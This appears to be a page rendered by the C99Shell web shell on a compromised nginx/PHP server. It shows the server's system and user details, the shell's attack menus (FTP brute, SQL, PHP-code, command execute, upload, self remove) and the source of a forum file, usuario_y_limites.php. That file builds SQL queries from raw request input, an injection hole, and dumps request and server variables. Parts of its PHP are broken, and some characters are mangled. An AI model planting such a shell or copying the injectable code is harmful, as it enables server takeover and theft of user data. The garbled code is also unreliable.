!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/automatas/   drwxrwxrwx
Free 83.28 GB of 96.73 GB (86.1%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     usuario_y_limites.php (2.17 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include ("/home/wwwroot/frames/conn.php");  
echo "<pre>";





// cambio de tercio. Primero se mira si es un usuario, so no lo es, es an�nimo.
$sql="SELECT t1.session_user_id, t2.username_clean as usuario
FROM papyr225_phpb1.phpbb_sessions t1, papyr225_phpb1.phpbb_users t2
WHERE t1.session_user_id = t2.user_id
AND t1.session_id = '".$_REQUEST['phpbb3_ver2_sid']."'";

$res=mysql_query($sql,$conn);
$row=mysql_fetch_array($res);


  
  if ($row[session_user_id]==or   !$row[session_user_id]){
        
        // es anonimo
        $user="an�nimo";
        $grupo="an�nimo";
  }else{
        
        // usuario registrado
            $user=$row['usuario'];
      
  
        // buscamos el grupo. si no se encuentra, es normal
$sql="SELECT t1.usuario,t1.grupo, t2.limite from papyr225_papyre.control_usuarios as t1, papyr225_papyre.limites_usuarios as t2   WHERE t1.grupo=t2.grupo and t1.usuario='$user'";

$res2=mysql_query($sql,$conn);
$row2=mysql_fetch_array($res2);

if (empty($row2['grupo'])){
    // no se encuentra
    
    $grupo="normal";
}else{
    // es colaborador o administrador
    $grupo=$row2['grupo'];
}

 }
  
    $sql="select limite from papyr225_papyre.limites_usuarios where grupo='$grupo'";

$resv=mysql_query($sql,$conn);
$rowv=mysql_fetch_array($resv);

    $limite_descargas=$rowv['limite'];
        echo "\n <b>usuario:    $user".chr(10);
         echo "limite es </b>".$limite_descargas."\n";

  // 
      // a�adido para considerar clouflare
    
    if (!empty($_SERVER['HTTP_CF_CONNECTING_IP'])){
        echo "\n <B>tachannnnnnn PASANDO POR CLOUDFLARE </B>\n";
        if ($_SERVER["HTTP_X_FORWARDED_FOR"]>''){
    echo "        existe HTTP_X_FORWARDED_FOR (cloudfare)";
    echo $_SERVER["HTTP_X_FORWARDED_FOR"]."-".$_SERVER["HTTP_CF_CONNECTING_IP"]."\n";
        
        
    }else{
        echo $_SERVER["HTTP_CF_CONNECTING_IP"]; 
    }
    }else{    
        echo "\n no pasa por  CLOUDFLARE \n";   
    if ($_SERVER) {
        if ($_SERVER["HTTP_X_FORWARDED_FOR"]>''){
            echo "        existe HTTP_X_FORWARDED_FOR (directo)"
    echo  $_SERVER["HTTP_X_FORWARDED_FOR"]."-".$_SERVER["REMOTE_ADDR"]."\n";
        }else{
            echo $_SERVER["REMOTE_ADDR"];
        }
    

    } else {

    echo  getenv'REMOTE_ADDR' )."\n";

}
    }
    
    print_r($_REQUEST); 
print_r($_SERVER);
print_rgetenv'REMOTE_ADDR' ));  
echo "\n";
    













     

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.003 ]--